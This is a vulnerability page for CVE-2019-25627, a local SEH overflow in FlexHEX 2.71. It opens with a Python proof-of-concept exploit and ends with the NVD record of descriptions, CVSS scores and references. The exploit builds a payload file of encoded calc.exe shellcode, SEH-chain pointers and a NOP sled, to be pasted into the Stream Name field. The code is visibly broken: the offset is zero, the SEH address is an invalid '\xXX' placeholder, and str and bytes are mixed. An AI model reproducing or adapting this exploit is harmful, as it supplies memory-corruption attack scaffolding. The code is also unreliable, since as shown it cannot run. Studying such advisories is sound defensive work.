CVE-2019-25627

#!/usr/bin/python # -*- coding: utf-8 -*- # PoC for CVE-2019-25627 (FlexHEX SEH Overflow) # Generates a malicious file to trigger the buffer overflow. import sys # Bad characters check might be required depending on the context # Shellcode to execute calc.exe (windows/exec CMD=calc.exe) shellcode = ("\xd9\xc5\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a" "\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45\x50\x45\x50\x4c" "\x49\x4b\x55\x46\x51\x48\x52\x42\x44\x4c\x4b\x50\x52\x50" "\x30\x4c\x4b\x47\x32\x44\x4c\x4c\x4b\x51\x42\x44\x54\x4c" "\x4b\x50\x52\x46\x50\x4c\x4b\x51\x5a\x47\x4c\x4e\x6b\x42" "\x46\x4c\x4b\x44\x4c\x50\x34\x54\x54\x4c\x4b\x50\x53\x50" "\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x44\x4e\x6b\x43\x31\x4a" "\x4e\x46\x51\x49\x50\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" "\x57\x49\x54\x48\x41\x4b\x51\x4b\x45\x31\x51\x59\x43\x6a" "\x56\x31\x4b\x4f\x4d\x30\x50\x58\x43\x30\x43\x30\x45\x50" "\x4c\x4b\x42\x38\x44\x58\x4c\x49\x4b\x4f\x49\x70\x4e\x75" "\x49\x50\x42\x4e\x42\x46\x42\x36\x43\x66\x4a\x48\x46\x49" "\x4d\x50\x4f\x4d\x4e\x4b\x4f\x49\x46\x46\x33\x46\x33\x50" "\x32\x45\x38\x45\x51\x4c\x4b\x50\x4f\x4e\x36\x50\x50\x56" "\x30\x4c\x4b\x47\x36\x46\x50\x4e\x6b\x42\x50\x44\x4c\x4c" "\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b" "\x4f\x48\x55\x4c\x4f\x4f\x4f\x48\x59\x4f\x4f\x4f\x48\x59" "\x43\x30\x45\x50\x43\x58\x44\x47\x42\x53\x46\x52\x51\x4f" "\x50\x52\x43\x30\x51\x53\x51\x43\x47\x33\x43\x43") # Payload construction structure # Note: Offsets need to be determined via debugging (e.g., using pattern_create.rb) offset = 0 # Replace with actual offset to SEH handler nseh = b"\xeb\x06\x90\x90" # Short jump to shellcode seh = b"\xXX\xXX\xXX\xXX" # POP POP RET address (replace with valid address) padding = b"\x90" * 16 # NOP sled before shellcode # Generate the malicious buffer buffer = b"A" * offset + nseh + seh + padding + shellcode try: print("[*] Creating malicious payload file...") with open("exploit.txt", "wb") as f: f.write(buffer) print("[+] File 'exploit.txt' created successfully.") print("[*] Paste the content of this file into the FlexHEX Stream Name field.") except Exception as e: print(f"[-] Error creating file: {e}")

{"cve": {"id": "CVE-2019-25627", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:02.560", "lastModified": "2026-04-15T16:10:01.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FlexHEX 2.71 contains a local buffer overflow vulnerability in the Stream Name field that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overflow. Attackers can craft a malicious text file with carefully aligned shellcode and SEH chain pointers, paste the contents into the Stream Name dialog, and execute arbitrary commands like calc.exe when the exception handler is triggered."}, {"lang": "es", "value": "FlexHEX 2.71 contiene una vulnerabilidad local de desbordamiento de búfer en el campo Stream Name que permite a atacantes locales ejecutar código arbitrario al desencadenar un desbordamiento del gestor de excepciones estructuradas (SEH). Los atacantes pueden crear un archivo de texto malicioso con shellcode y punteros de cadena SEH cuidadosamente alineados, pegar el contenido en el diálogo Stream Name, y ejecutar comandos arbitrarios como calc.exe cuando se desencadena el gestor de excepciones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexhex:flexhex:2.71:*:*:*:*:*:*:*", "matchCriteriaId": "973521E2-9B32-4B7E-AE6F-3A5406A9C7C7"}]}]}], "references": [{"url": "http://www.flexhex.com", "source": "[email protected]", "tags": ["Broken Link", "Product"]}, {"url": "http://www.flexhex.com/download/flexhex_setup.exe", "source": "[email protected]", "tags": ["Broken Link", "Product"]}, {"url": "https://www.exploit-db.com/exploits/46665", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/flexhex-local-buffer-overflow-via-seh-unicode", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}